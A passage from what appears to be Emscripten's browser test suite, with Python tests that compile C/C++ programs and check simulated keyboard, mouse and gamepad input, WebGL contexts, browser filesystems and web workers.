keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=[_main]'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('test_glfw_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_success]', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_success]', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(test_file('idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([test_file('test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([test_file('test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
